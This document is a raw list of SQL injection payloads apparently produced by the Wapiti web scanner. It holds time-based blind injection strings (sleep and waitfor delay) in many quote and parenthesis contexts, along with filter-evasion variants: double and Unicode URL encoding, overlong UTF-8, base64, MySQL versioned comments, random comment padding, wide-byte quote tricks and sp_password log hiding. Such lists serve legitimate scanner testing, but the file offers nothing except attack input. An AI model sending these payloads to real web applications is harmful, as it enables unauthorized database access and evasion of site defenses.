# from wapiti

# from wapiti

# from wapiti
%00
IyBmcm9tIHdhcGl0aQo=
# from wapiti

# from wapiti

%2523%2520%2566%2572%256F%256D%2520%2577%2561%2570%2569%2574%2569%250A
%23%20%66%72%6F%6D%20%77%61%70%69%74%69%0A
%u0023%u0020%u0066%u0072%u006F%u006D%u0020%u0077%u0061%u0070%u0069%u0074%u0069%u000A
# from wapiti

# from wapiti

# from wapiti

# from wapiti

# from wapiti

# from wapiti

# from wapiti

# from wapiti

# from wapiti

# FROFROMM wapiti

%C0%AB%C0%AAfrom%C0%AAwapiti%C0%8A
%# %f%r%o%m %w%a%p%i%t%i%

# from wapiti

# from wapiti

# from wapiti
 and '0having'='0having'
# from wapiti
sp_password
#/**/from/**/wapiti

# from wapiti

# from wapiti

# from wapiti

#%0Cfrom%05wapiti

# from wapiti

#%09from%0Dwapiti

# from wapiti

#+from+wapiti

#%0Cfrom%0Awapiti

# from wapiti

# from wapiti

# from wapiti

# from wapiti

# from wapiti

# from wapiti

sleep(__TIME__)#

sleep(__TIME__)#

sleep(__TIME__)#
%00
c2xlZXAoX19USU1FX18pIwo=
sleep(__TIME__)#

sleep(__TIME__)#

%2573%256C%2565%2565%2570%2528%255F%255F%2554%2549%254D%2545%255F%255F%2529%2523%250A
%73%6C%65%65%70%28%5F%5F%54%49%4D%45%5F%5F%29%23%0A
%u0073%u006C%u0065%u0065%u0070%u0028%u005F%u005F%u0054%u0049%u004D%u0045%u005F%u005F%u0029%u0023%u000A
sleep(__TIME__)#

sleep(__TIME__)#

sleep(__TIME__)#

sleep(__TIME__)#

sleep(__TIME__)#

sleep(__TIME__)#

sleep(__TIME__)#

sleep(__TIME__)#

sleep(__TIME__)#

sleep(__TIME__)#

sleep%C0%AA%C0%DF%C0%DFTIME%C0%DF%C0%DF%C0%AB%C0%AB%C0%8A
%s%l%e%e%p%(%_%_%T%I%M%E%_%_%)%#%

sleep(__TIME__)#

sleep(__TIME__)#

sleep(__TIME__)#
 and '0having'='0having'
sleep(__TIME__)#
sp_password
sleep(__TIME__)#/**/
sleep(__TIME__)#

sleep(__TIME__)#

sleep(__TIME__)#

sleep(__TIME__)#%0A
sleep(__TIME__)#

sleep(__TIME__)#%09
sleep(__TIME__)#

sleep(__TIME__)#+
sleep(__TIME__)#%0A
sleep(__TIME__)#

sleep(__TIME__)#

sleep(__TIME__)#

sleep(__TIME__)#

sleep(__TIME__)#

sleep(__TIME__)#

1 or sleep(__TIME__)#

1 or sleep(__TIME__)#

1 or sleep(__TIME__)#
%00
MSBvciBzbGVlcChfX1RJTUVfXykjCg==
1 or sleep(__TIME__)#

1 or sleep(__TIME__)#

%2531%2520%256F%2572%2520%2573%256C%2565%2565%2570%2528%255F%255F%2554%2549%254D%2545%255F%255F%2529%2523%250A
%31%20%6F%72%20%73%6C%65%65%70%28%5F%5F%54%49%4D%45%5F%5F%29%23%0A
%u0031%u0020%u006F%u0072%u0020%u0073%u006C%u0065%u0065%u0070%u0028%u005F%u005F%u0054%u0049%u004D%u0045%u005F%u005F%u0029%u0023%u000A
1 or sleep(__TIME__)#

1 or sleep(__TIME__)#

1 or sleep(__TIME__)#

1 or sleep(__TIME__)#

1 or sleep(__TIME__)#

1 or sleep(__TIME__)#

1 /*!30929or sleep(__TIME__)*/#

1 /*!00000or sleep(__TIME__)*/#

1 or sleep(__TIME__)#

1 or sleep(__TIME__)#

1%C0%AAor%C0%AAsleep%C0%AA%C0%DF%C0%DFTIME%C0%DF%C0%DF%C0%AB%C0%AB%C0%8A
%1 %o%r %s%l%e%e%p%(%_%_%T%I%M%E%_%_%)%#%

1 or sleep(__TIME__)#

1 or sleep(__TIME__)#

1 or sleep(__TIME__)#
 and '0having'='0having'
1 or sleep(__TIME__)#
sp_password
1/**/or/**/sleep(__TIME__)#

1--aWQplPnMhQ%0Aor--LInEoLwTpycb%0Asleep(__TIME__)#

1%23VSCrdjFZj%0Aor%23alwoTZq%0Asleep(__TIME__)#

1%23QdudYbhSqZgq%0Aor%23oXNEpMd%0Asleep(__TIME__)#

1%05or%0Esleep(__TIME__)#

1%23%0Aor%23%0Asleep(__TIME__)#

1%0Cor%0Csleep(__TIME__)#

1--%0Aor--%0Asleep(__TIME__)#

1+or+sleep(__TIME__)#

1%09or%0Csleep(__TIME__)#

1 or sleep(__TIME__)#

1 or sleep(__TIME__)#

1 or sleep(__TIME__)#

1 or sleep(__TIME__)#

1 or sleep(__TIME__)#

1 or sleep(__TIME__)#

" or sleep(__TIME__)#

" or sleep(__TIME__)#

" or sleep(__TIME__)#
%00
IiBvciBzbGVlcChfX1RJTUVfXykjCg==
" or sleep(__TIME__)#

" or sleep(__TIME__)#

%2522%2520%256F%2572%2520%2573%256C%2565%2565%2570%2528%255F%255F%2554%2549%254D%2545%255F%255F%2529%2523%250A
%22%20%6F%72%20%73%6C%65%65%70%28%5F%5F%54%49%4D%45%5F%5F%29%23%0A
%u0022%u0020%u006F%u0072%u0020%u0073%u006C%u0065%u0065%u0070%u0028%u005F%u005F%u0054%u0049%u004D%u0045%u005F%u005F%u0029%u0023%u000A
" or sleep(__TIME__)#

" or sleep(__TIME__)#

" or sleep(__TIME__)#

" or sleep(__TIME__)#

" or sleep(__TIME__)#

" or sleep(__TIME__)#

" /*!30472or sleep(__TIME__)*/#

" /*!00000or sleep(__TIME__)*/#

" or sleep(__TIME__)#

" or sleep(__TIME__)#

%C0%AA%C0%AAor%C0%AAsleep%C0%AA%C0%DF%C0%DFTIME%C0%DF%C0%DF%C0%AB%C0%AB%C0%8A
%" %o%r %s%l%e%e%p%(%_%_%T%I%M%E%_%_%)%#%

" or sleep(__TIME__)#

" or sleep(__TIME__)#

" or sleep(__TIME__)#
 and '0having'='0having'
" or sleep(__TIME__)#
sp_password
"/**/or/**/sleep(__TIME__)#

"--MHHkPEJIuF%0Aor--DPkFCfNEVw%0Asleep(__TIME__)#

"%23GisAGd%0Aor%23QRVXplRrh%0Asleep(__TIME__)#

"%23sNyFWDYfLNUI%0Aor%23qoQWHwJoe%0Asleep(__TIME__)#

"%0Eor%07sleep(__TIME__)#

"%23%0Aor%23%0Asleep(__TIME__)#

"%0Aor%09sleep(__TIME__)#

"--%0Aor--%0Asleep(__TIME__)#

"+or+sleep(__TIME__)#

"%09or%0Csleep(__TIME__)#

" or sleep(__TIME__)#

" or sleep(__TIME__)#

" or sleep(__TIME__)#

" or sleep(__TIME__)#

" or sleep(__TIME__)#

" or sleep(__TIME__)#

%EF%BC%87 or sleep(__TIME__)#

%00%27 or sleep(__TIME__)#

' or sleep(__TIME__)#
%00
JyBvciBzbGVlcChfX1RJTUVfXykjCg==
' or sleep(__TIME__)#

' or sleep(__TIME__)#

%2527%2520%256F%2572%2520%2573%256C%2565%2565%2570%2528%255F%255F%2554%2549%254D%2545%255F%255F%2529%2523%250A
%27%20%6F%72%20%73%6C%65%65%70%28%5F%5F%54%49%4D%45%5F%5F%29%23%0A
%u0027%u0020%u006F%u0072%u0020%u0073%u006C%u0065%u0065%u0070%u0028%u005F%u005F%u0054%u0049%u004D%u0045%u005F%u005F%u0029%u0023%u000A
' or sleep(__TIME__)#

' or sleep(__TIME__)#

' or sleep(__TIME__)#

' or sleep(__TIME__)#

' or sleep(__TIME__)#

' or sleep(__TIME__)#

' /*!30398or sleep(__TIME__)*/#

' /*!00000or sleep(__TIME__)*/#

' or sleep(__TIME__)#

' or sleep(__TIME__)#

%C0%AF%C0%AAor%C0%AAsleep%C0%AA%C0%DF%C0%DFTIME%C0%DF%C0%DF%C0%AB%C0%AB%C0%8A
%' %o%r %s%l%e%e%p%(%_%_%T%I%M%E%_%_%)%#%

' or sleep(__TIME__)#

' or sleep(__TIME__)#

' or sleep(__TIME__)#
 and '0having'='0having'
' or sleep(__TIME__)#
sp_password
'/**/or/**/sleep(__TIME__)#

'--HhoCEHlPaMTg%0Aor--IgPcGCmBTv%0Asleep(__TIME__)#

'%23cyZBkLX%0Aor%23omPTVO%0Asleep(__TIME__)#

'%23YNqoFZPSVVS%0Aor%23AbKnuiY%0Asleep(__TIME__)#

'%0Aor%0Dsleep(__TIME__)#

'%23%0Aor%23%0Asleep(__TIME__)#

'%0Cor%0Csleep(__TIME__)#

'--%0Aor--%0Asleep(__TIME__)#

'+or+sleep(__TIME__)#

'%0Dor%0Asleep(__TIME__)#

' or sleep(__TIME__)#

%bf%27 or sleep(__TIME__)#

' or sleep(__TIME__)#

' or sleep(__TIME__)#

' or sleep(__TIME__)#

' or sleep(__TIME__)#

" or sleep(__TIME__)="

" or sleep(__TIME__)="

" or sleep(__TIME__)="
%00
IiBvciBzbGVlcChfX1RJTUVfXyk9Igo=
" or sleep(__TIME__)="

" or sleep(__TIME__) LIKE "

%2522%2520%256F%2572%2520%2573%256C%2565%2565%2570%2528%255F%255F%2554%2549%254D%2545%255F%255F%2529%253D%2522%250A
%22%20%6F%72%20%73%6C%65%65%70%28%5F%5F%54%49%4D%45%5F%5F%29%3D%22%0A
%u0022%u0020%u006F%u0072%u0020%u0073%u006C%u0065%u0065%u0070%u0028%u005F%u005F%u0054%u0049%u004D%u0045%u005F%u005F%u0029%u003D%u0022%u000A
" or sleep(__TIME__)="

" or sleep(__TIME__) LIKE "

" or sleep(__TIME__)="

" or sleep(__TIME__)="

" or sleep(__TIME__)="

" or sleep(__TIME__)="

" /*!30223or sleep(__TIME__)="
*/
" /*!00000or sleep(__TIME__)="
*/
" or sleep(__TIME__)="

" or sleep(__TIME__)="

%C0%AA%C0%AAor%C0%AAsleep%C0%AA%C0%DF%C0%DFTIME%C0%DF%C0%DF%C0%AB%C0%BF%C0%AA%C0%8A
%" %o%r %s%l%e%e%p%(%_%_%T%I%M%E%_%_%)%=%"%

" or sleep(__TIME__)="

" or sleep(__TIME__)="

" or sleep(__TIME__)="
 and '0having'='0having'
" or sleep(__TIME__)="
-- sp_password
"/**/or/**/sleep(__TIME__)="

"--KXJFoEiUM%0Aor--WuqJqC%0Asleep(__TIME__)="--CmxJNeOseW%0A
"%23esqiACRBZKi%0Aor%23kENtHMj%0Asleep(__TIME__)="%23APsAgJm%0A
"%23iKrHEZiFi%0Aor%23eqJolSJZ%0Asleep(__TIME__)="%23JFgrbR%0A
"%0Cor%0Dsleep(__TIME__)="

"%23%0Aor%23%0Asleep(__TIME__)="%23%0A
"%09or%0Asleep(__TIME__)="

"--%0Aor--%0Asleep(__TIME__)="--%0A
"+or+sleep(__TIME__)="

"%09or%0Csleep(__TIME__)="

" or sleep(__TIME__)="

" or sleep(__TIME__)="

" or sleep(__TIME__)="

" or sleep(__TIME__)="

" or sleep(__TIME__)="

" or sleep(__TIME__)="

%EF%BC%87 or sleep(__TIME__)=%EF%BC%87

%00%27 or sleep(__TIME__)=%00%27

' or sleep(__TIME__)='
%00
JyBvciBzbGVlcChfX1RJTUVfXyk9Jwo=
' or sleep(__TIME__)='

' or sleep(__TIME__) LIKE '

%2527%2520%256F%2572%2520%2573%256C%2565%2565%2570%2528%255F%255F%2554%2549%254D%2545%255F%255F%2529%253D%2527%250A
%27%20%6F%72%20%73%6C%65%65%70%28%5F%5F%54%49%4D%45%5F%5F%29%3D%27%0A
%u0027%u0020%u006F%u0072%u0020%u0073%u006C%u0065%u0065%u0070%u0028%u005F%u005F%u0054%u0049%u004D%u0045%u005F%u005F%u0029%u003D%u0027%u000A
' or sleep(__TIME__)='

' or sleep(__TIME__) LIKE '

' or sleep(__TIME__)='

' or sleep(__TIME__)='

' or sleep(__TIME__)='

' or sleep(__TIME__)='

' /*!30411or sleep(__TIME__)='
*/
' /*!00000or sleep(__TIME__)='
*/
' or sleep(__TIME__)='

' or sleep(__TIME__)='

%C0%AF%C0%AAor%C0%AAsleep%C0%AA%C0%DF%C0%DFTIME%C0%DF%C0%DF%C0%AB%C0%BF%C0%AF%C0%8A
%' %o%r %s%l%e%e%p%(%_%_%T%I%M%E%_%_%)%=%'%

' or sleep(__TIME__)='

' or sleep(__TIME__)='

' or sleep(__TIME__)='
 and '0having'='0having'
' or sleep(__TIME__)='
-- sp_password
'/**/or/**/sleep(__TIME__)='

'--omJdFwmwBNX%0Aor--UTANWPJi%0Asleep(__TIME__)='--bXnXjMccXu%0A
'%23ARXAOpP%0Aor%23YUHDSufzGT%0Asleep(__TIME__)='%23CRxlOCXQhrLi%0A
'%23UcjnWWRCwO%0Aor%23oPkmsBUIEqIV%0Asleep(__TIME__)='%23SaQmFAOJwfip%0A
'%03or%05sleep(__TIME__)='

'%23%0Aor%23%0Asleep(__TIME__)='%23%0A
'%0Cor%0Bsleep(__TIME__)='

'--%0Aor--%0Asleep(__TIME__)='--%0A
'+or+sleep(__TIME__)='

'%0Cor%09sleep(__TIME__)='

' or sleep(__TIME__)='

%bf%27 or sleep(__TIME__)='

' or sleep(__TIME__)='

' or sleep(__TIME__)='

' or sleep(__TIME__)='

' or sleep(__TIME__)='

1) or sleep(__TIME__)#

1) or sleep(__TIME__)#

1) or sleep(__TIME__)#
%00
MSkgb3Igc2xlZXAoX19USU1FX18pIwo=
1) or sleep(__TIME__)#

1) or sleep(__TIME__)#

%2531%2529%2520%256F%2572%2520%2573%256C%2565%2565%2570%2528%255F%255F%2554%2549%254D%2545%255F%255F%2529%2523%250A
%31%29%20%6F%72%20%73%6C%65%65%70%28%5F%5F%54%49%4D%45%5F%5F%29%23%0A
%u0031%u0029%u0020%u006F%u0072%u0020%u0073%u006C%u0065%u0065%u0070%u0028%u005F%u005F%u0054%u0049%u004D%u0045%u005F%u005F%u0029%u0023%u000A
1) or sleep(__TIME__)#

1) or sleep(__TIME__)#

1) or sleep(__TIME__)#

1) or sleep(__TIME__)#

1) or sleep(__TIME__)#

1) or sleep(__TIME__)#

1) /*!30553or sleep(__TIME__)*/#

1) /*!00000or sleep(__TIME__)*/#

1) or sleep(__TIME__)#

1) or sleep(__TIME__)#

1%C0%AB%C0%AAor%C0%AAsleep%C0%AA%C0%DF%C0%DFTIME%C0%DF%C0%DF%C0%AB%C0%AB%C0%8A
%1%) %o%r %s%l%e%e%p%(%_%_%T%I%M%E%_%_%)%#%

1) or sleep(__TIME__)#

1) or sleep(__TIME__)#

1) or sleep(__TIME__)#
 and '0having'='0having'
1) or sleep(__TIME__)#
sp_password
1)/**/or/**/sleep(__TIME__)#

1)--tKxzxEk%0Aor--oySBwyddRAz%0Asleep(__TIME__)#

1)%23zCODqyiTkzw%0Aor%23xTIBlO%0Asleep(__TIME__)#

1)%23IsOvtncR%0Aor%23HMJJZEzDfG%0Asleep(__TIME__)#

1)%07or%03sleep(__TIME__)#

1)%23%0Aor%23%0Asleep(__TIME__)#

1)%0Dor%09sleep(__TIME__)#

1)--%0Aor--%0Asleep(__TIME__)#

1)+or+sleep(__TIME__)#

1)%0Dor%0Dsleep(__TIME__)#

1) or sleep(__TIME__)#

1) or sleep(__TIME__)#

1) or sleep(__TIME__)#

1) or sleep(__TIME__)#

1) or sleep(__TIME__)#

1) or sleep(__TIME__)#

") or sleep(__TIME__)="

") or sleep(__TIME__)="

") or sleep(__TIME__)="
%00
Iikgb3Igc2xlZXAoX19USU1FX18pPSIK
") or sleep(__TIME__)="

") or sleep(__TIME__) LIKE "

%2522%2529%2520%256F%2572%2520%2573%256C%2565%2565%2570%2528%255F%255F%2554%2549%254D%2545%255F%255F%2529%253D%2522%250A
%22%29%20%6F%72%20%73%6C%65%65%70%28%5F%5F%54%49%4D%45%5F%5F%29%3D%22%0A
%u0022%u0029%u0020%u006F%u0072%u0020%u0073%u006C%u0065%u0065%u0070%u0028%u005F%u005F%u0054%u0049%u004D%u0045%u005F%u005F%u0029%u003D%u0022%u000A
") or sleep(__TIME__)="

") or sleep(__TIME__) LIKE "

") or sleep(__TIME__)="

") or sleep(__TIME__)="

") or sleep(__TIME__)="

") or sleep(__TIME__)="

") /*!30344or sleep(__TIME__)="
*/
") /*!00000or sleep(__TIME__)="
*/
") or sleep(__TIME__)="

") or sleep(__TIME__)="

%C0%AA%C0%AB%C0%AAor%C0%AAsleep%C0%AA%C0%DF%C0%DFTIME%C0%DF%C0%DF%C0%AB%C0%BF%C0%AA%C0%8A
%"%) %o%r %s%l%e%e%p%(%_%_%T%I%M%E%_%_%)%=%"%

") or sleep(__TIME__)="

") or sleep(__TIME__)="

") or sleep(__TIME__)="
 and '0having'='0having'
") or sleep(__TIME__)="
-- sp_password
")/**/or/**/sleep(__TIME__)="

")--uiJGsh%0Aor--kaFxbIgvbmQ%0Asleep(__TIME__)="--OyAXxb%0A
")%23PAXuzKsDy%0Aor%23aeLGChgJM%0Asleep(__TIME__)="%23wSTWEIpT%0A
")%23RwcdAQy%0Aor%23kXZaPlMqOe%0Asleep(__TIME__)="%23auabZsUGXHwl%0A
")%05or%0Fsleep(__TIME__)="

")%23%0Aor%23%0Asleep(__TIME__)="%23%0A
")%0Bor%0Csleep(__TIME__)="

")--%0Aor--%0Asleep(__TIME__)="--%0A
")+or+sleep(__TIME__)="

")%09or%09sleep(__TIME__)="

") or sleep(__TIME__)="

") or sleep(__TIME__)="

") or sleep(__TIME__)="

") or sleep(__TIME__)="

") or sleep(__TIME__)="

") or sleep(__TIME__)="

%EF%BC%87) or sleep(__TIME__)=%EF%BC%87

%00%27) or sleep(__TIME__)=%00%27

') or sleep(__TIME__)='
%00
Jykgb3Igc2xlZXAoX19USU1FX18pPScK
') or sleep(__TIME__)='

') or sleep(__TIME__) LIKE '

%2527%2529%2520%256F%2572%2520%2573%256C%2565%2565%2570%2528%255F%255F%2554%2549%254D%2545%255F%255F%2529%253D%2527%250A
%27%29%20%6F%72%20%73%6C%65%65%70%28%5F%5F%54%49%4D%45%5F%5F%29%3D%27%0A
%u0027%u0029%u0020%u006F%u0072%u0020%u0073%u006C%u0065%u0065%u0070%u0028%u005F%u005F%u0054%u0049%u004D%u0045%u005F%u005F%u0029%u003D%u0027%u000A
') or sleep(__TIME__)='

') or sleep(__TIME__) LIKE '

') or sleep(__TIME__)='

') or sleep(__TIME__)='

') or sleep(__TIME__)='

') or sleep(__TIME__)='

') /*!30626or sleep(__TIME__)='
*/
') /*!00000or sleep(__TIME__)='
*/
') or sleep(__TIME__)='

') or sleep(__TIME__)='

%C0%AF%C0%AB%C0%AAor%C0%AAsleep%C0%AA%C0%DF%C0%DFTIME%C0%DF%C0%DF%C0%AB%C0%BF%C0%AF%C0%8A
%'%) %o%r %s%l%e%e%p%(%_%_%T%I%M%E%_%_%)%=%'%

') or sleep(__TIME__)='

') or sleep(__TIME__)='

') or sleep(__TIME__)='
 and '0having'='0having'
') or sleep(__TIME__)='
-- sp_password
')/**/or/**/sleep(__TIME__)='

')--SNnuTjcVCdvq%0Aor--XwXgSrv%0Asleep(__TIME__)='--mXjxkuqbl%0A
')%23fOITVDcPiNC%0Aor%23VQtTdWC%0Asleep(__TIME__)='%23xhZcIQvHWJy%0A
')%23cvUKRqf%0Aor%23qcyjoZYG%0Asleep(__TIME__)='%23hbdYKB%0A
')%0For%0Dsleep(__TIME__)='

')%23%0Aor%23%0Asleep(__TIME__)='%23%0A
')%0Dor%0Dsleep(__TIME__)='

')--%0Aor--%0Asleep(__TIME__)='--%0A
')+or+sleep(__TIME__)='

')%0Cor%0Dsleep(__TIME__)='

') or sleep(__TIME__)='

%bf%27) or sleep(__TIME__)='

') or sleep(__TIME__)='

') or sleep(__TIME__)='

') or sleep(__TIME__)='

') or sleep(__TIME__)='

1)) or sleep(__TIME__)#

1)) or sleep(__TIME__)#

1)) or sleep(__TIME__)#
%00
MSkpIG9yIHNsZWVwKF9fVElNRV9fKSMK
1)) or sleep(__TIME__)#

1)) or sleep(__TIME__)#

%2531%2529%2529%2520%256F%2572%2520%2573%256C%2565%2565%2570%2528%255F%255F%2554%2549%254D%2545%255F%255F%2529%2523%250A
%31%29%29%20%6F%72%20%73%6C%65%65%70%28%5F%5F%54%49%4D%45%5F%5F%29%23%0A
%u0031%u0029%u0029%u0020%u006F%u0072%u0020%u0073%u006C%u0065%u0065%u0070%u0028%u005F%u005F%u0054%u0049%u004D%u0045%u005F%u005F%u0029%u0023%u000A
1)) or sleep(__TIME__)#

1)) or sleep(__TIME__)#

1)) or sleep(__TIME__)#

1)) or sleep(__TIME__)#

1)) or sleep(__TIME__)#

1)) or sleep(__TIME__)#

1)) /*!30383or sleep(__TIME__)*/#

1)) /*!00000or sleep(__TIME__)*/#

1)) or sleep(__TIME__)#

1)) or sleep(__TIME__)#

1%C0%AB%C0%AB%C0%AAor%C0%AAsleep%C0%AA%C0%DF%C0%DFTIME%C0%DF%C0%DF%C0%AB%C0%AB%C0%8A
%1%)%) %o%r %s%l%e%e%p%(%_%_%T%I%M%E%_%_%)%#%

1)) or sleep(__TIME__)#

1)) or sleep(__TIME__)#

1)) or sleep(__TIME__)#
 and '0having'='0having'
1)) or sleep(__TIME__)#
sp_password
1))/**/or/**/sleep(__TIME__)#

1))--NYmkMmoRH%0Aor--TJZwMkbBz%0Asleep(__TIME__)#

1))%23MVvfbfYgqeca%0Aor%23pYeTBDNPHvd%0Asleep(__TIME__)#

1))%23SHchjt%0Aor%23IhaIKA%0Asleep(__TIME__)#

1))%01or%02sleep(__TIME__)#

1))%23%0Aor%23%0Asleep(__TIME__)#

1))%09or%0Bsleep(__TIME__)#

1))--%0Aor--%0Asleep(__TIME__)#

1))+or+sleep(__TIME__)#

1))%0Aor%0Asleep(__TIME__)#

1)) or sleep(__TIME__)#

1)) or sleep(__TIME__)#

1)) or sleep(__TIME__)#

1)) or sleep(__TIME__)#

1)) or sleep(__TIME__)#

1)) or sleep(__TIME__)#

")) or sleep(__TIME__)="

")) or sleep(__TIME__)="

")) or sleep(__TIME__)="
%00
IikpIG9yIHNsZWVwKF9fVElNRV9fKT0iCg==
")) or sleep(__TIME__)="

")) or sleep(__TIME__) LIKE "

%2522%2529%2529%2520%256F%2572%2520%2573%256C%2565%2565%2570%2528%255F%255F%2554%2549%254D%2545%255F%255F%2529%253D%2522%250A
%22%29%29%20%6F%72%20%73%6C%65%65%70%28%5F%5F%54%49%4D%45%5F%5F%29%3D%22%0A
%u0022%u0029%u0029%u0020%u006F%u0072%u0020%u0073%u006C%u0065%u0065%u0070%u0028%u005F%u005F%u0054%u0049%u004D%u0045%u005F%u005F%u0029%u003D%u0022%u000A
")) or sleep(__TIME__)="

")) or sleep(__TIME__) LIKE "

")) or sleep(__TIME__)="

")) or sleep(__TIME__)="

")) or sleep(__TIME__)="

")) or sleep(__TIME__)="

")) /*!30236or sleep(__TIME__)="
*/
")) /*!00000or sleep(__TIME__)="
*/
")) or sleep(__TIME__)="

")) or sleep(__TIME__)="

%C0%AA%C0%AB%C0%AB%C0%AAor%C0%AAsleep%C0%AA%C0%DF%C0%DFTIME%C0%DF%C0%DF%C0%AB%C0%BF%C0%AA%C0%8A
%"%)%) %o%r %s%l%e%e%p%(%_%_%T%I%M%E%_%_%)%=%"%

")) or sleep(__TIME__)="

")) or sleep(__TIME__)="

")) or sleep(__TIME__)="
 and '0having'='0having'
")) or sleep(__TIME__)="
-- sp_password
"))/**/or/**/sleep(__TIME__)="

"))--qmLZhBDZq%0Aor--DzilhTrg%0Asleep(__TIME__)="--PSxPZON%0A
"))%23dYLNJgextfyM%0Aor%23utGTiVRi%0Asleep(__TIME__)="%23XYOftvzKoKg%0A
"))%23ZVSTBdjUwz%0Aor%23iHfPzY%0Asleep(__TIME__)="%23CFwuKMhyTJ%0A
"))%07or%0Asleep(__TIME__)="

"))%23%0Aor%23%0Asleep(__TIME__)="%23%0A
"))%0Aor%0Bsleep(__TIME__)="

"))--%0Aor--%0Asleep(__TIME__)="--%0A
"))+or+sleep(__TIME__)="

"))%0Aor%0Asleep(__TIME__)="

")) or sleep(__TIME__)="

")) or sleep(__TIME__)="

")) or sleep(__TIME__)="

")) or sleep(__TIME__)="

")) or sleep(__TIME__)="

")) or sleep(__TIME__)="

%EF%BC%87)) or sleep(__TIME__)=%EF%BC%87

%00%27)) or sleep(__TIME__)=%00%27

')) or sleep(__TIME__)='
%00
JykpIG9yIHNsZWVwKF9fVElNRV9fKT0nCg==
')) or sleep(__TIME__)='

')) or sleep(__TIME__) LIKE '

%2527%2529%2529%2520%256F%2572%2520%2573%256C%2565%2565%2570%2528%255F%255F%2554%2549%254D%2545%255F%255F%2529%253D%2527%250A
%27%29%29%20%6F%72%20%73%6C%65%65%70%28%5F%5F%54%49%4D%45%5F%5F%29%3D%27%0A
%u0027%u0029%u0029%u0020%u006F%u0072%u0020%u0073%u006C%u0065%u0065%u0070%u0028%u005F%u005F%u0054%u0049%u004D%u0045%u005F%u005F%u0029%u003D%u0027%u000A
')) or sleep(__TIME__)='

')) or sleep(__TIME__) LIKE '

')) or sleep(__TIME__)='

')) or sleep(__TIME__)='

')) or sleep(__TIME__)='

')) or sleep(__TIME__)='

')) /*!30679or sleep(__TIME__)='
*/
')) /*!00000or sleep(__TIME__)='
*/
')) or sleep(__TIME__)='

')) or sleep(__TIME__)='

%C0%AF%C0%AB%C0%AB%C0%AAor%C0%AAsleep%C0%AA%C0%DF%C0%DFTIME%C0%DF%C0%DF%C0%AB%C0%BF%C0%AF%C0%8A
%'%)%) %o%r %s%l%e%e%p%(%_%_%T%I%M%E%_%_%)%=%'%

')) or sleep(__TIME__)='

')) or sleep(__TIME__)='

')) or sleep(__TIME__)='
 and '0having'='0having'
')) or sleep(__TIME__)='
-- sp_password
'))/**/or/**/sleep(__TIME__)='

'))--lveoBFwGs%0Aor--adFhlc%0Asleep(__TIME__)='--RzGKtKoESjco%0A
'))%23ZIDDxLpep%0Aor%23vpupQtXU%0Asleep(__TIME__)='%23PjEEfzTwqy%0A
'))%23iABNqYcpH%0Aor%23uzpooi%0Asleep(__TIME__)='%23JvEJGoWHyz%0A
'))%01or%01sleep(__TIME__)='

'))%23%0Aor%23%0Asleep(__TIME__)='%23%0A
'))%0Dor%0Csleep(__TIME__)='

'))--%0Aor--%0Asleep(__TIME__)='--%0A
'))+or+sleep(__TIME__)='

'))%0Dor%0Asleep(__TIME__)='

')) or sleep(__TIME__)='

%bf%27)) or sleep(__TIME__)='

')) or sleep(__TIME__)='

')) or sleep(__TIME__)='

')) or sleep(__TIME__)='

')) or sleep(__TIME__)='

;waitfor delay %EF%BC%870:0:__TIME__%EF%BC%87--

;waitfor delay %00%270:0:__TIME__%00%27--

;waitfor delay '0:0:__TIME__'--
%00
O3dhaXRmb3IgZGVsYXkgJzA6MDpfX1RJTUVfXyctLQo=
;waitfor delay '0:0:__TIME__'--

;waitfor delay '0:0:__TIME__'--

%253B%2577%2561%2569%2574%2566%256F%2572%2520%2564%2565%256C%2561%2579%2520%2527%2530%253A%2530%253A%255F%255F%2554%2549%254D%2545%255F%255F%2527%252D%252D%250A
%3B%77%61%69%74%66%6F%72%20%64%65%6C%61%79%20%27%30%3A%30%3A%5F%5F%54%49%4D%45%5F%5F%27%2D%2D%0A
%u003B%u0077%u0061%u0069%u0074%u0066%u006F%u0072%u0020%u0064%u0065%u006C%u0061%u0079%u0020%u0027%u0030%u003A%u0030%u003A%u005F%u005F%u0054%u0049%u004D%u0045%u005F%u005F%u0027%u002D%u002D%u000A
;waitfor delay '0:0:__TIME__'--

;waitfor delay '0:0:__TIME__'--

;waitfor delay '0:0:__TIME__'--

;waitfor delay '0:0:__TIME__'--

;waitfor delay '0:0:__TIME__'--

;waitfor delay '0:0:__TIME__'--

;waitfor /*!30739delay '0:0:__TIME__'*/--

;waitfor /*!00000delay '0:0:__TIME__'*/--

;waitfor delay '0:0:__TIME__'--

;waitfor delay '0:0:__TIME__'--

%C0%BBwaitfor%C0%AAdelay%C0%AA%C0%AF0%C0%BA0%C0%BA%C0%DF%C0%DFTIME%C0%DF%C0%DF%C0%AF%C0%AF%C0%AF%C0%8A
%;%w%a%i%t%f%o%r %d%e%l%a%y %'%0%:%0%:%_%_%T%I%M%E%_%_%'%-%-%

;waitfor delay '0:0:__TIME__'--

;waitfor delay '0:0:__TIME__'--

;waitfor delay '0:0:__TIME__'--
 and '0having'='0having'
;waitfor delay '0:0:__TIME__'--
-- sp_password
;waitfor/**/delay/**/'0:0:__TIME__'--

;waitfor--yAudoGef%0Adelay--gMppDQh%0A'0:0:__TIME__'----NePKJwOaBwv%0A
;waitfor%23ISWWFCRx%0Adelay%23NnTJBPOdT%0A'0:0:__TIME__'--%23yaBJsXqkkuT%0A
;waitfor%23wbTeXGT%0Adelay%23HqeAZhtMS%0A'0:0:__TIME__'--%23ZNjnIxItqDjd%0A
;waitfor%08delay%01'0:0:__TIME__'--

;waitfor%23%0Adelay%23%0A'0:0:__TIME__'--%23%0A
;waitfor%0Adelay%0D'0:0:__TIME__'--

;waitfor--%0Adelay--%0A'0:0:__TIME__'----%0A
;waitfor+delay+'0:0:__TIME__'--

;waitfor%0Cdelay%0C'0:0:__TIME__'--

;waitfor delay '0:0:__TIME__'--

;waitfor delay %bf%270:0:__TIME__'--

;waitfor delay '0:0:__TIME__'--

;waitfor delay '0:0:__TIME__'--

;waitfor delay '0:0:__TIME__'--

;waitfor delay '0:0:__TIME__'--

);waitfor delay %EF%BC%870:0:__TIME__%EF%BC%87--

);waitfor delay %00%270:0:__TIME__%00%27--

);waitfor delay '0:0:__TIME__'--
%00
KTt3YWl0Zm9yIGRlbGF5ICcwOjA6X19USU1FX18nLS0K
);waitfor delay '0:0:__TIME__'--

);waitfor delay '0:0:__TIME__'--

%2529%253B%2577%2561%2569%2574%2566%256F%2572%2520%2564%2565%256C%2561%2579%2520%2527%2530%253A%2530%253A%255F%255F%2554%2549%254D%2545%255F%255F%2527%252D%252D%250A
%29%3B%77%61%69%74%66%6F%72%20%64%65%6C%61%79%20%27%30%3A%30%3A%5F%5F%54%49%4D%45%5F%5F%27%2D%2D%0A
